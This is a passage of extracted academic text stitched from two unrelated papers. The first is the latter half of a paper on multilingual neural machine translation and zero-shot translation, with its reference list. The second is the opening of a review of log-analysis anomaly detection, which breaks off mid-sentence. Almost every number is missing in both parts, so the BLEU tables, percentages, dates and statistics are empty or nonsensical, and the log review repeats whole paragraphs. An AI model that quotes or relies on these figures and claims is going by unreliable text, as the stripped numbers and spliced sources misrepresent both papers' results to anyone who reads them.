observe that oversampling helps the smaller language pair (en→de) at the cost of lower quality for the larger language pair (en→fr). the model without oversampling achieves better results on the larger language compared to the smaller one as ex- pected. we also find that this effect is more prominent on smaller datasets (wmt) and much less so on our much larger production datasets. . many to many in this section, we report on experiments when there are multiple source languages and multiple target languages within a single model — the most difficult setup. since multiple target languages are given, the input needs to be prepended with the target language token as above. the results are presented in table . we see that the multilingual production models with the same model size and vocabulary size as the single language models are quite close to the baselines – the average relative loss in bleu score across all experiments is only approximately . %. although there are some significant losses in qual- ity from training many languages jointly using a model with the same total number of parameters as the single language pair models, these models re- duce the total complexity involved in training and productionization. . large-scale experiments this section shows the result of combining produc- tion language pairs having a total of b parameters ( m per single model) into a single multilingual table : many to many: bleu scores for single language pair and multilingual models. ?: no oversampling model single multi diff wmt en→de . . - . wmt en→fr . . - . wmt de→en . . - . wmt fr→en . . - . wmt en→de? . . - . wmt en→fr? . . - . wmt de→en? . . - . wmt fr→en? . . + . prod en→ja . . - . prod en→ko . . - . prod ja→en . . - . prod ko→en . . - . prod en→es . . + . prod en→pt . . - . prod es→en . . - . prod pt→en . . - . model. a range of multilingual models were trained, starting from the same size as a single language pair model with m parameters ( nodes) up to m parameters ( nodes). as above, the input needs to be prepended with the target language to- ken. we oversample the examples from the smaller language pairs to balance the data as explained above. the results for single language pair models ver- sus multilingual models with increasing numbers of parameters are summarized in table . we find that the multilingual models are on average worse than the single models (about . % to . % relative de- pending on size, however, some actually get better) and as expected the average difference gets smaller when going to larger multilingual models. it should be noted that the largest multilingual model we have trained has still about five times less parameters than the combined single models. the multilingual model also requires only roughly / -th of the training time (or computing resources) to converge compared to the combined single models (total training time for all our models is still in the order of weeks). another important point is that since we only train for a little longer than a standard single model, the individual language pairs can see as little as / -th of the data in comparison to their single language pair models but still produce satisfactory results. in summary, multilingual nmt enables us to table : large-scale experiments: bleu scores for single language pair and multilingual models. model single multi multi multi multi #nodes #params b m m m m en→ja . . . . . en→ko . . . . . ja→en . . . . . ko→en . . . . . en→es . . . . . en→pt . . . . . es→en . . . . . pt→en . . . . . en→de . . . . . en→fr . . . . . de→en . . . . . fr→en . . . . . ave diff - - . - . - . - . vs single - - . % - . % - . % - . % group languages with little loss in quality while hav- ing the benefits of better training efficiency, smaller number of models, and easier productionization. . zero-shot translation the most straight-forward approach of translating between languages where no or little parallel data is available is to use explicit bridging, meaning to translate to an intermediate language first and then to translate to the desired target language. the in- termediate language is often english as xx→en and en→yy data is more readily available. the two po- tential disadvantages of this approach are: a) total translation time doubles, b) the potential loss of qual- ity by translating to/from the intermediate language. an interesting benefit of our approach is that it al- lows to perform directly implicit bridging (zero-shot translation) between a language pair for which no explicit parallel training data has been seen without any modification to the model. obviously, the model will only be able to do zero-shot translation between languages it has seen individually as source and tar- get languages during training at some point, not for entirely new ones. to demonstrate this we will use two multilingual models — a model trained with examples from two different language pairs, pt→en and en→es (model ), and a model trained with examples from four dif- ferent language pairs, en↔pt and en↔es (model ). as with the previous multilingual models, both of these models perform comparable to or even slightly better than the baseline single models for the lan- guage pairs explicitly seen. additionally, we show that both of these models can generate reasonable quality pt→es translations (bleu scores above ) without ever having seen pt→es data during training. to our knowledge this is the first successful demon- stration of true multilingual zero-shot translation. table summarizes our results for the pt→es translation experiments. rows (a) and (b) show the performance of the phrase-based machine translation (pbmt) system and the nmt system through ex- plicit bridging (pt→en, then en→es). it can be seen that the nmt system outperforms the pbmt system by close to bleu points. for comparison, we also built a single nmt model on all available pt→es parallel sentences (see (c) in table ). table : portuguese→spanish bleu scores using various models. model zero-shot bleu (a) pbmt bridged no . (b) nmt bridged no . (c) nmt pt→es no . (d) model (pt→en, en→es) yes . (e) model (en↔{es, pt}) yes . (f) model + incremental training no . the most interesting observation is that both model and model can perform zero-shot trans- lation with reasonable quality (see (d) and (e)) com- pared to the initial expectation that this would not work at all. note that model outperforms model by close to bleu points although model was trained with four language pairs as opposed to with only two for model (with both models having the same number of total parameters). in this case the ad- dition of spanish on the source side and portuguese on the target side helps pt→es zero-shot translation (which is the opposite direction of where we would expect it to help). we believe that this unexpected effect is only possible because our shared architec- ture enables the model to learn a form of interlingua between all these languages. we explore this hypoth- esis in more detail in section . finally we incrementally train zero-shot model with a small amount of true pt→es parallel data (an order of magnitude less than table (c)) and obtain the best quality and half the decoding time compared to explicit bridging (table (b)). the resulting model cannot be called zero-shot anymore since some true parallel data has been used to improve it. overall this shows that the proposed approach of implicit bridging using zero-shot translation via multilingual models can serve as a good baseline for further in- cremental training with relatively small amounts of true parallel data of the zero-shot direction. this result is especially significant for non-english low- resource language pairs where it might be easier to obtain parallel data with english but much harder to obtain parallel data for language pairs where neither the source nor the target language is english. we explore the effect of using parallel data in more detail in section . . since portuguese and spanish are of the same lan- guage family, an interesting question is how well zero-shot translation works for less related languages. table shows the results for explicit and implicit bridging from spanish to japanese using the large- scale model from table – spanish and japanese can be regarded as quite unrelated. as expected zero- shot translation works worse than explicit bridging and the quality drops relatively more (roughly % drop in bleu score) than for the case of more re- lated languages as shown above. despite the quality drop, this proves that our approach enables zero-shot translation even between unrelated languages. table : spanish→japanese bleu scores for explicit and implicit bridging using the -language pair large-scale model from table . model bleu nmt es→ja explicitly bridged . nmt es→ja implicitly bridged . . effect of direct parallel data in this section, we explore two ways of leveraging available parallel data to improve zero-shot transla- tion quality, similar in spirit to what was reported in firat et al., ( c). for our multilingual architecture we consider: • incrementally training the multilingual model on the additional parallel data for the zero-shot directions. • training a new multilingual model with all avail- able parallel data mixed equally. for our experiments, we use a baseline model which we call “zero-shot” trained on a combined parallel corpus of english↔{belarusian(be), russian(ru), ukrainian(uk)}. we trained a second model on the above corpus together with additional ru↔{be, uk} data. we call this model “from-scratch”. both mod- els support four target languages, and are evaluated on our standard test sets. as done previously we oversample the data such that all language pairs are represented equally. finally, we take the best check- point of the “zero-shot” model, and run incremental training on a small portion of the data used to train the “from-scratch” model for a short period of time until convergence (in this case % of “zero-shot” model total training time). we call this model “incre- mental”. as can be seen from table , for the english↔x directions, all three models show comparable scores. on the ru↔{be, uk} directions, the “zero-shot” model already achieves relatively high bleu scores for all directions except one, without any explicit parallel data. this could be because these languages are linguistically related. in the “from-scratch” col- umn, we see that training a new model from scratch improves the zero-shot translation directions further. however, this strategy has a slightly negative effect on the en↔x directions because our oversampling strategy will reduce the frequency of the data from these directions. in the final column, we see that in- cremental training with direct parallel data recovers most of the bleu score difference between the first two columns on the zero-shot language pairs. in sum- mary, our shared architecture models the zero-shot language pairs quite well and hence enables us to easily improve their quality with a small amount of additional parallel data. visual analysis the results of this paper — that training a model across multiple languages can enhance performance at the individual language level, and that zero-shot translation can be effective — raise a number of ques- tions about how these tasks are handled inside the model. is the network learning some sort of shared representation, in which sentences with the same meaning are represented in similar ways regardless of language? does the model operate on zero-shot table : bleu scores for english↔{belarusian, russian, ukrainian} models. zero-shot from-scratch incremental en→be . . . en→ru . . . en→uk . . . be→en . . . ru→en . . . uk→en . . . be→ru . . . ru→be . . . ru→uk . . . uk→ru . . . translations in the same way as it treats language pairs it has been trained on? one way to study the representations used by the network is to look at the activations of the network during translation. a starting point for investigation is the set of context vectors, i.e., the sum of internal encoder states weighted by their attention probabili- ties per step (eq. ( ) in (bahdanau et al., )). a translation of a single sentence generates a se- quence of context vectors. in this context, our orig- inal questions about shared representation can be studied by looking at how the vector sequences of different sentences relate. we could then ask for ex- ample: do sentences cluster together depending on the source or target language? or instead do sen- tences with similar meanings cluster, regardless of language? we try to find answers to these questions by looking at lower-dimensional representations of internal embeddings of the network that humans can more easily interpret. . evidence for an interlingua several trained networks indeed show strong vi- sual evidence of a shared representation. for ex- ample, figure below was produced from a many- to-many model trained on four language pairs, english↔japanese and english↔korean. to visual- ize the model in action we began with a small corpus of triples of semantically identical cross-language phrases. that is, each triple contained phrases in en- glish, japanese and korean with the same underlying meaning. to compile these triples, we searched a ground-truth database for english sentences which were paired with both japanese and korean transla- tions. we then applied the trained model to translate each sentence of each triple into the two other possible lan- guages. performing this process yielded six new sen- tences based on each triple, for a total of ∗ = total translations with , steps corresponding to the same number of context vectors. since context vectors are high-dimensional, we use the tensorflow embedding projector to map them into more acces- sible d space via t-sne (maaten and hinton, ). in the following diagrams, each point represents a single decoding step during the translation process. points that represent steps for a given sentence are connected by line segments. figure shows a global view of all , context vectors. points produced from the same original sen- tence triple are all given the same (random) color. inspection of these clusters shows that each strand represents a single sentence, and clusters of strands generally represent a set of translations of the same underlying sentence, but with different source and target languages. at right are two close-ups: one of an individual cluster, still coloring based on membership in the same triple, and one where we have colored by source language. . partially separated representations not all models show such clean semantic clustering. sometimes we observed joint embeddings in some regions of space coexisting with separate large clus- ters which contained many context vectors from just one language pair. for example, figure a shows a t-sne projection of context vectors from a model that was trained on portuguese→english (blue) and english→spanish (yellow) and performing zero-shot translation from portuguese→spanish (red). this projection shows semantically identical triples translated as de- scribed above, yielding total translations. the large red region on the left primarily contains zero- shot portuguese→spanish translations. in other words, for a significant number of sentences, the zero-shot translation has a different embedding than the two trained translation directions. on the other hand, some zero-shot translation vectors do seem to https://www.tensorflow.org/get_started/ embedding_viz figure : a t-sne projection of the embedding of semantically identical sentences translated across all possible directions, yielding a total of , steps (dots in the image), from the model trained on english↔japanese and english↔korean examples. (a) a bird’s-eye view of the embedding, coloring by the index of the semantic sentence. well-defined clusters each having a single color are apparent. (b) a zoomed in view of one of the clusters with the same coloring. all of the sentences within this cluster are translations of “the stratosphere extends from about km to about km in altitude.” (c) the same cluster colored by source language. all three source languages can be seen within this cluster. figure : (a) a bird’s-eye view of a t-sne projection of an embedding of the model trained on portuguese→english (blue) and english→spanish (yellow) examples with a portuguese→spanish zero-shot bridge (red). the large red region on the left primarily contains the zero-shot portuguese→spanish translations. (b) a scatter plot of bleu scores of zero-shot translations versus the average point-wise distance between the zero-shot translation and a non-bridged translation. the pearson correlation coefficient is − . . fall near the embeddings found in other languages, as on the large region on the right. it is natural to ask whether the large cluster of “sep- arated” zero-shot translations has any significance. a definitive answer requires further investigation, but in this case zero-shot translations in the separated area do tend to have lower bleu scores. figure b shows a plot of bleu scores of a zero- shot translation versus the average pointwise distance between it and the same translation from a trained language pair. an interesting area for future research is to find a more reliable correspondence between em- bedding geometry and model performance to predict the quality of a zero-shot translation during decoding by comparing it to the embedding of the translation through a trained language pair. mixing languages having a mechanism to translate from a random source language to a single chosen target language using an additional source token made us think about what happens when languages are mixed on the source or target side. in particular, we were interested in the following two experiments: ) can a multilin- gual model successfully handle multi-language in- put (code-switching) in the middle of a sentence?; ) what happens when a multilingual model is triggered with a linear mix of two target language tokens? . source language code-switching here we show how multilingual models deal with source language code-switching – an example from a multilingual {ja,ko}→en model is below. mixing japanese and korean in the source produces in many cases correct english translations, showing that code- switching can be handled by this model, although no such code-switching samples were present in the training data. note that the model can effectively han- dle the different typographic scripts since the individ- ual characters/wordpieces are present in the shared vocabulary. • japanese: 私は東京大学の学生です。→ i am a student at tokyo university. • korean: 나는도쿄대학의학생입니다. → i am a student at tokyo university. • japanese/korean: 私は東京大学학생입니 다. → i am a student of tokyo university. interestingly, the mixed-language translation is slightly different from both single source language translations. . weighted target language selection here we test what happens when we mix target lan- guages. using a multilingual en→{ja, ko} model, we feed a linear combination ( −w)< ja>+w< ko> of the embedding vectors for “< ja>” and “< ko>”. clearly, for w = the model should produce japanese, for w = it should produce korean, but what happens in between? the model may produce some sort of intermediate language (“japarean”), but the results turn out to be less surprising. most of the time the output just switches from one language to another around w = . . in some cases, for intermediate values of w, the model switches languages mid-sentence. a possible explanation for this behavior is that the target language model, implicitly learned by the decoder lstm, may make it very hard to mix words from different languages, especially when they use different scripts. table shows an example of mixed target lan- guages (ja/ko), where we can observe an interesting transition in the script and grammar. at wko = . , the model translates the source sentence into a mix of japanese and korean. at wko = . , the sen- tence is translated into full korean, where all of the source words are captured, however, the ordering of the words is not natural. when wko is increased to . , the model starts to translate the source sentence into a korean sentence that sounds more natural. conclusion we present a simple solution to multilingual nmt. we show that we can train multilingual nmt mod- els that can be used to translate between a number of different languages using a single model where all parameters are shared, which as a positive side- effect also improves the translation quality of low- resource languages in the mix. we also show that zero-shot translation without explicit bridging is pos- sible, which is the first time to our knowledge that a the korean translation does not contain spaces and uses ‘。’ as punctuation symbol, and these are all artifacts of applying a japanese postprocessor. table : gradually mixing target languages ja/ko. wko i must be getting somewhere near the centre of the earth. . 私は地球の中心の近くにどこかに行っている に違いない。 . 私は地球の中心近くのどこかに着いているに 違いない。 . 私は地球の中心の近くのどこかになっている に違いない。 . 私は지구の中心의가까이에어딘가에도착하고있 어야한다。 . 나는지구의센터의가까이에어딘가에도착하고있 어야한다。 . 나는지구의중심근처어딘가에도착해야합니다。 . 나는어딘가지구의중심근처에도착해야합니다。 . 나는어딘가지구의중심근처에도착해야합니다。 form of true transfer learning has been shown to work for machine translation. to explicitly improve the zero-shot translation quality, we explore two ways of adding available parallel data and find that small additional amounts are sufficient to reach satisfac- tory results. in our largest experiment we merge language pairs into a single model and achieve only slightly lower translation quality as for the sin- gle language pair baselines despite the drastically reduced amount of modeling capacity per language in the multilingual model. visual interpretation of the results shows that these models learn a form of inter- lingua representation between all involved language pairs. the simple architecture makes it possible to mix languages on the source or target side to yield some interesting translation examples. our approach has been shown to work reliably in a google-scale production setting and enables us to scale to a large number of languages quickly. acknowledgements we would like to thank the entire google brain team and google translate team for their foundational contributions to this project. in particular, we thank junyoung chung for his insights on the topic and alex rudnick and otavio good for helpful sugges- tions. we would also like to thank the tacl action editor and the reviewers for their feedback. references martin abadi and paul barham et al. . tensorflow: a system for large-scale machine learning. in th usenix symposium on operating systems design and implementation (osdi ), pages – . dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in international conference on learning representations. ozan caglayan and walid aransa et al. . does mul- timodality help human and machine for translation and image captioning? in proceedings of the first confer- ence on machine translation, pages – , berlin, germany, august. association for computational lin- guistics. rich caruana. . multitask learning. in learning to learn, pages – . springer. kyunghyun cho, bart van merrienboer, Çaglar gülçehre, fethi bougares, holger schwenk, and yoshua ben- gio. . learning phrase representations using rnn encoder-decoder for statistical machine translation. in conference on empirical methods in natural language processing. josep crego and jungi kim et al. . systran’s pure neural machine translation systems. arxiv preprint arxiv: . . daxiang dong, hua wu, wei he, dianhai yu, and haifeng wang. . multi-task learning for multiple language translation. in proceedings of the rd annual meeting of the association for computational linguistics, pages – . orhan firat, kyunghyun cho, and yoshua bengio. a. multi-way, multilingual neural machine translation with a shared attention mechanism. in the con- ference of the north american chapter of the associa- tion for computational linguistics: human language technologies, san diego california, usa, june - , , pages – . orhan firat, kyunghyun cho, baskaran sankaran, fatos t. yarman vural, and yoshua bengio. b. multi-way, multilingual neural machine translation. computer speech and language. orhan firat, baskaran sankaran, yaser al-onaizan, fatos t. yarman vural, and kyunghyun cho. c. zero-resource translation with multi-lingual neural ma- chine translation. in proceedings of the con- ference on empirical methods in natural language processing, pages – , austin, texas, november. association for computational linguistics. robert m french. . catastrophic forgetting in connectionist networks. trends in cognitive sciences, ( ): – . philip gage. . a new algorithm for data compression. c users journal, ( ): – , february. dan gillick, cliff brunk, oriol vinyals, and amarnag sub- ramanya. . multilingual language processing from bytes. in proceedings of the conference of the north american chapter of the association for compu- tational linguistics: human language technologies, pages – , san diego, california, june. associ- ation for computational linguistics. william john hutchins and harold l. somers. . an introduction to machine translation, volume . academic press london. nal kalchbrenner and phil blunsom. . recurrent continuous translation models. in conference on em- pirical methods in natural language processing. jason lee, kyunghyun cho, and thomas hofmann. . fully character-level neural machine transla- tion without explicit segmentation. arxiv preprint arxiv: . . minh-thang luong, quoc v le, ilya sutskever, oriol vinyals, and lukasz kaiser. a. multi-task se- quence to sequence learning. in international confer- ence on learning representations. minh-thang luong, hieu pham, and christopher d. man- ning. b. effective approaches to attention-based neural machine translation. in conference on empiri- cal methods in natural language processing. minh-thang luong, ilya sutskever, quoc v le, oriol vinyals, and wojciech zaremba. c. addressing the rare word problem in neural machine translation. in proceedings of the rd annual meeting of the as- sociation for computational linguistics and the th international joint conference on natural language processing. laurens van der maaten and geoffrey hinton. . visualizing data using t-sne. journal of machine learning research, . richard h richens. . interlingual machine transla- tion. the computer journal, ( ): – . tanja schultz and katrin kirchhoff. . multilingual speech processing. elsevier academic press, amster- dam, boston, paris. mike schuster and kaisuke nakajima. . japanese and korean voice search. ieee international conference on acoustics, speech and signal process- ing. jean sébastien, cho kyunghyun, roland memisevic, and yoshua bengio. . on using very large target vo- cabulary for neural machine translation. in proceedings of the rd annual meeting of the association for com- putational linguistics and the th international joint conference on natural language processing. rico sennrich, barry haddow, and alexandra birch. a. controlling politeness in neural machine trans- lation via side constraints. in the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, san diego california, usa, june - , , pages – . rico sennrich, barry haddow, and alexandra birch. b. neural machine translation of rare words with subword units. in proceedings of the th annual meet- ing of the association for computational linguistics. ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in advances in neural information processing systems, pages – . yulia tsvetkov, sunayana sitaram, manaal faruqui, guillaume lample, patrick littell, david mortensen, alan w black, lori levin, and chris dyer. . poly- glot neural language models: a case study in cross- lingual phonetic representation learning. in proceed- ings of the conference of the north american chapter of the association for computational linguis- tics: human language technologies, pages – , san diego, california, june. association for computa- tional linguistics. yonghui wu, mike schuster, and zhifeng chen et al. . google’s neural machine translation system: bridging the gap between human and machine translation. arxiv preprint arxiv: . v . hayahide yamagishi, shin kanouchi, and mamoru ko- machi. . controlling the voice of a sentence in japanese-to-english neural machine translation. in proceedings of the rd workshop on asian translation, pages – , osaka, japan, december. jie zhou, ying cao, xuguang wang, peng li, and wei xu. . deep recurrent models with fast-forward connections for neural machine translation. transac- tions of the association for computational linguistics, : – . barret zoph and kevin knight. . multi-source neural translation. in naacl hlt , the confer- ence of the north american chapter of the association for computational linguistics: human language tech- nologies, san diego california, usa, june - , , pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - review of anomaly detection based on log analysis wu xudong laboratory of wireless network and intelligent system xi'an technological university xi'an, , china e-mail: wuxudong_wxd@ .com abstract—the development of the internet and the emergence of large-scale systems promote the rapid development of society, and bring a lot of convenience to people. then comes the problem of network security, privacy theft, malicious attacks and other illegal acts still exist, a qualified software system will log the key operation behavior of the software. therefore, log analysis has become an important means of anomaly detection. based on log analysis, this paper consulted the related literature on anomaly detection, elaborated the research status of anomaly detection based on log analysis from the aspects of template matching, rule self-generation and outlier analysis, and analyzed the challenges faced by anomaly detection based on log analysis. keywords-log analysis; distributed; big data; anomaly detection i. introduction with the development of the internet, big data and artificial intelligence have penetrated into people's lives, unknowingly changing the way people live, food, and transportation, making people's lives faster, more efficient, and easier. research in various fields of computer is moving towards bionics, including human-like big data processing, human-like computer vision and image processing, human-like voice input, etc. these studies make the computer in a domain not only clairvoyance, shunfeng ear, can also save and process a large number of various types of data obtained from various aspects, forming an invisible "superman" individual. in the past years, with the rapid development of the internet in china, people's lifestyles have undergone tremendous changes. chinese internet users continue to grow. according to cnnic’s th "statistical report on internet development in china", as of june , the number of internet users in china reached million, an increase of . million from the end of , and the internet penetration rate reached . %, compared with the end of . an increase of . percentage points. the proportions of using desktop computers, laptop computers and tablet computers to surf the internet were . %, . % and . % respectively. these not only reflect the continuous increase in the number of netizens, but also the rapid and continuous growth of log data from the side. the log records the time point selected by the developer that is worthy of attention and the changes of state or event that is worthy of attention at this point in time. it is the most important source of information for understanding the operating status of the system and diagnosing system problems. traditionally, system maintainers use tools such as grep and awk to filter keywords such as "error" or international journal of advanced network, monitoring and controls volume , no. , "exception" in the log to find problems in system operation. when the filtering keywords cannot meet the demand, more experienced personnel will write scripts to impose more complex filtering rules. the cost of this method is very high, writing effective scripts requires a deep understanding of the target system, and these scripts written for specific target systems cannot be applied to other systems, and their versatility is poor. but even without considering the cost, this approach has become no longer feasible for today's software systems. the ever-increasing log data scale and network security issues make network managers face severe challenges: not only need to ensure the stable and efficient operation of the network, but also need to provide secure network services as much as possible. fortunately, in recent years, distributed computing technology has become more mature. distributed computing platforms such as hadoop, spark, flume, storm are being accepted and applied by more and more companies, and are gradually being used in various industries for data storage. and online or offline analysis, which brings opportunities for log data anomaly detection. at the same time, issues such as security and privacy in the network have also emerged. distributed denial of service attacks, zombie codes, trojan horses, ransomware, worms and other malicious software have a great negative impact on people’s lives. once the malware operates, it may cause irreversible losses to the company’s economy. , poses a great threat to people's privacy. a study showed that [ ][ ]: random sample surveys of large-scale systems, more than half of the system failure problems were not logged. at this time, maintenance personnel are required to manually find the cause of the problem. due to the large amount of code, the time invested is much more. high-quality software code can greatly help the detection efficiency after a program error occurs. log records at key locations are an important means to ensure that the abnormality can be quickly located and repaired. therefore, it is necessary to add log records to key positions of the program, and log analysis has become an important method of anomaly detection. the internet brings convenience to our life, but also brings a series of network security problems. the main characteristics of internet security problems are as follows: a variety of types, all the time, causing huge losses. all kinds of human attacks, mis-operation, network equipment failure will bring network security problems. distributed denial of service attack, zombie code, trojan horse, blackmail program, worm virus and other malicious software appear frequently. once the malicious software operates, it may cause irreparable loss to the company's economy and cause great impact on people's life. the log records the time points that developers choose to pay attention to and the changes of states or events at this time point. it is the most important information source to understand the system operation status and diagnose system problems. traditionally, system maintenance personnel use grep, awk and other tools to filter keywords in logs, such as "error" or "exception", to find problems in system operation. when the filtering keywords can't meet the requirements, senior personnel will write scripts to impose more complex filtering rules. the cost of this method is very high, writing effective scripts needs to have a deep understanding of the target system, but these scripts written for specific target system can not be applied to other systems, and the generality is very poor. but even without considering the cost, this approach is no longer feasible for today's software systems. with the increasing scale of log data and network security issues, network managers are facing severe challenges: not only need to ensure the stable and efficient operation of the network, but also need to provide as much as possible secure network services. fortunately, in recent years, the distributed computing international journal of advanced network, monitoring and controls volume , no. , technology is becoming more and more mature. hadoop, spark, flume, storm and other distributed computing platforms are being accepted and applied by more and more enterprises, and are gradually applied to various industries for data storage and online or offline analysis, which brings opportunities for log data anomaly detection. this article first talks about the related knowledge of log analysis and anomaly detection, and then summarizes the current research status of log anomaly detection from the aspects of template matching, rule generation and outlier analysis, analyzes and classifies the articles that have been read, and summarizes the current the types and rules of log anomaly detection are found to be difficult to solve during the detection process. finally, the future work of anomaly detection based on log analysis is summarized. ii. related technologies and concepts of log anomaly detection a. log analysis the log in the computer is a record of events generated with the operation of network equipment, applications, and systems. each line records the date, time, type, operator, and description of related operations. figure shows a partial log record of the application. in reality, the log data generated by a system is very large, conforming to the v characteristics defined in big data, namely, volume, variety, velocity, and value. these log data will only occupy storage space if they are shelved, and will bring unlimited value if they are properly used. because these log data have v characteristics, it also determines that manual analysis of these data is unrealistic, and log analysis tools must be used to make full use of the value of log data. figure . part of the application log here are several current mainstream log analysis tools. slunk is a full-text search engine for machine data and a hosted log management tool. its main functions include: log aggregation, search, meaning extraction, grouping, formatting, and visualization of results. elk is composed of three parts: elasticsearch, logstash, and kibana. elasticsearch is a near real-time search platform. compared with mongodb, elasticsearch has more comprehensive functions and is very capable of performing full-text search. it can index, search, and sort documents, filter. logstash is a log collection tool, which can collect various messages from local, network and other places and send them to elasticsearch. kibana provides a visual interface on the web and has a cool dashboard. b. store log data due to the huge amount of log data and semi-structured data, the traditional structured database can not meet the storage requirements of log data. hdfs (hadoop distributed file system) can provide high-throughput data access, which is very suitable for large-scale data sets, and it is suitable for deployment on low-cost machines, which can meet the international journal of advanced network, monitoring and controls volume , no. , storage requirements of log data. in the experiment, the log data generated by the system needs to be stored in hdfs. the configured hdfs will automatically back up the data. the input data file is divided into fixed size blocks. the general size of the data block is mb. each data block is stored in different nodes. generally, each data block has three copies. the first copy is stored in the same node as the client, the second replica exists on a node in a different rack, and the third replica exists on another node in the same rack as the second replica. c. log data preprocessing log data preprocessing has three goals:  filtering "non-conforming" data and cleaning meaningless data;  format conversion and regularization;  filtering and separating various basic data with different needs according to the subsequent statistical requirements. in terms of filtering "non-conforming" data and cleaning meaningless data, the log data generated by the system may be "non-conforming" or meaningless. before the data format conversion and normalization, a judgment needs to be added to check whether the data is standard and intentional. if not, the data is considered useless and jumps to the next data directly. in terms of format conversion and regularization, we first analyze the characteristics of the data. the fields in each record are separated in the form of spaces. according to this feature, each record is segmented according to the space as the standard. for the fields with spaces inside, we need to use regular matching for special processing. after segmentation, each field is normalized, including time format conversion, number type conversion, path completion, etc. in the aspect of filtering and separating data with different needs, the required fields are extracted according to the needs of subsequent detection algorithms. d. anomaly detection anomalies usually include outliers, fluctuation points and abnormal event sequences. generally, given the input time series x, the outliers are timestamp value pairs (t, xt), where the observed value xt is different from the expected value of the time series, then the observed value xt is an outlier. fluctuation point refers to a given input time series x, at a certain time t its state or behavior in this time series is different from the values before and after t. an abnormal time series is a part of a given set of time series x={xi} that belongs to x but is inconsistent with most time series values on x. the abnormal point is given in the box in figure . peng dong et al. [ ] divided anomaly detection methods into three categories: techniques based on statistical models, techniques based on proximity, and techniques based on density. figure . outlier feature in data mining, anomaly detection identifies items, events, or observations that do not match the expected pattern or other items in the dataset. usually, abnormal items will turn into bank fraud, structural defects, medical problems, text errors and other types of problems. anomalies are also known as outliers, novelty, noise, bias, and exceptions. especially in the detection of abuse and network intrusion, interesting objects are often not rare objects, but they are unexpected activities. this pattern does not follow the usual statistical definition of outliers as rare objects, so many anomaly detection methods will fail to deal with such data unless appropriate aggregation is carried out. on the contrary, clustering analysis algorithm may be able to detect the micro anomalous international journal of advanced network, monitoring and controls volume , no. , clustering formed by these patterns. there are three types of anomaly detection methods. under the assumption that most instances in the dataset are normal, the unsupervised anomaly detection method can detect the unlabeled test data by finding the most unmatched instance with other data. supervised anomaly detection requires a dataset that has been labeled "normal" and "abnormal" and involves training classifiers (the key difference from many other statistical classification problems is the inherent imbalance of anomaly detection). the semi supervised anomaly detection method creates a model representing normal behavior based on a given normal training data set, and then detects the possibility of test cases generated by the learning model. iii. research status of log anomaly detection technology anomaly detection refers to the process of finding data patterns that do not meet expectations from the data [ ]. anomaly detection behavior based on log data can be regarded as a classification problem in essence, that is to say, distinguish normal behavior and abnormal behavior from a large amount of abnormal log behavior data, and determine the specific attack method from the abnormal behavior [ ]. when the server is running, the log will record and generate the behavior of the user throughout the access process. you can find the information of abnormal users by processing the information in the log. therefore, analyzing logs has become one of the most effective methods to detect abnormal user behavior [ , , ]. with the rapid development of big data, log-based anomaly detection methods are divided into three categories: model-based technology, proximity-based technology and density-based technology. a. model-based technology model-based technology first builds a data model. anomalies are objects that the model cannot fit perfectly. since abnormal and normal objects can be regarded as defining two different classes, we can use classification techniques to build models of the two classes. however, the training set is very important in the classification technology. because anomalies are relatively rare, it is impossible to detect new anomalies that may appear [ ]. wang zhiyuan et al. [ ] used the log template to detect anomalies in . the log was cleaned first, and then the edit distance was used to cluster the text to form the log template. on the basis of the log template, tf-idf (word frequency-inverse file) was used. frequency) to form a feature vector, and then use logistic regression, bayesian, support vector machine and other weak classifiers to train to obtain the score feature vector, build a strong classifier based on the score feature vector and random forest, and finally use mutual information to detect the truth the correlation between the template and the clustering template, the accuracy and recall rate are used to detect the classification effect and various classifiers are compared. siwoon et al. [ ] proposed a new data storage and analysis architecture based on apache hive to process a large amount of hadoop log data, using average movement and -sigma technology to design and implement three anomaly detection methods, these three methods they are the basic method, linear weight method and exponential weight method. the first method calculates the average line and standard deviation of anomaly detection, but there are repeated detections. in order to solve this problem, there are two other weighted detection methods, namely linear weighting and exponential weighting. in the linear weighting method, the weight is given in proportion to the position of the log item, and the exponential weight method is to give the weight exponentially on top of the basic method. finally, the effectiveness of the proposed method is evaluated in a hadoop environment with a name node and four data nodes. fu et al. [ ] proposed a technique that does not require any specific application knowledge for anomaly detection in unstructured system logs, international journal of advanced network, monitoring and controls volume , no. , including a method of extracting log keys from free text messages. the false positive rate of their experiments under the hadoop platform is about %. xu et al. [ ] used source code to match the log format to find the relevant variables, extracted the features of the corresponding log variables through the bag-of-words model, and then used these features to reduce the dimensionality through the principal component analysis method, according to the maximum separability of principal component analysis detect abnormal log files, and finally use a decision tree to visualize the results. fronza et al. [ ] used the operation sequence represented by the random index, characterized the operation in each log according to its context, and then used the support vector machine to correlate the sequence to the fault or non-fault category to predict system failure . peng et al. [ ] applied text mining technology to classify messages in log files as common cases, improved classification accuracy by considering the time characteristics of log messages, and used visualization tools to evaluate and verify the effective time for system management mode. b. technology based on proximity proximity-based technology considers proximity measures between objects, such as "distance". zhang luqing et al. [ ] proposed a web attack data mining algorithm based on the anomaly degree of outliers, which first clustered http requests, and then proposed a detection model that approximates normal distribution. the algorithm first finds the arithmetic mean of each numerical attribute value and the most frequently occurring value in each categorical attribute as the centroid of the numerical attribute and the centroid of the categorical attribute, and after synthesis, the centroid t of the data set is obtained, and the distance between the object p and the centroid t is obtained. as the abnormality of p. finally, experiments have confirmed that the algorithm has a higher detection rate. jakub breier et al. [ ] proposed a log file anomaly detection method, which dynamically generates rules from certain patterns in sample files and can learn new types of attacks while minimizing the need for human behavior. the implementation uses the apache hadoop framework to provide distributed storage and distributed data processing to support parallel processing to speed up execution. since the incremental mining algorithm based on the local outlier factor requires multiple scans of the data set, zhang zhongping et al. [ ] proposed a flow data outlier mining algorithm (somrnn) based on inverse k nearest neighbors. using the sliding window model to update the current window requires only one scan, which improves the efficiency of the algorithm. grace et al. [ ] used data mining methods to analyze web log files to obtain more information about users. in their work, they describe the log file format, type and content, and provide an overview of the web usage mining process. liang bao et al. [ ] proposed a general method for mining console logs to detect system problems. first give some formal problem definitions, and then extract a set of log statements in the source code and generate a reachability graph to show the reachability of log statements. after that, log files are analyzed to create log messages by combining information about log statements with information retrieval techniques. the grouping of these messages is tracked according to the execution unit. a detection algorithm based on probabilistic suffix tree is proposed to organize and distinguish the significant statistical characteristics of sequences. experiments were conducted on the cloudstack test platform and 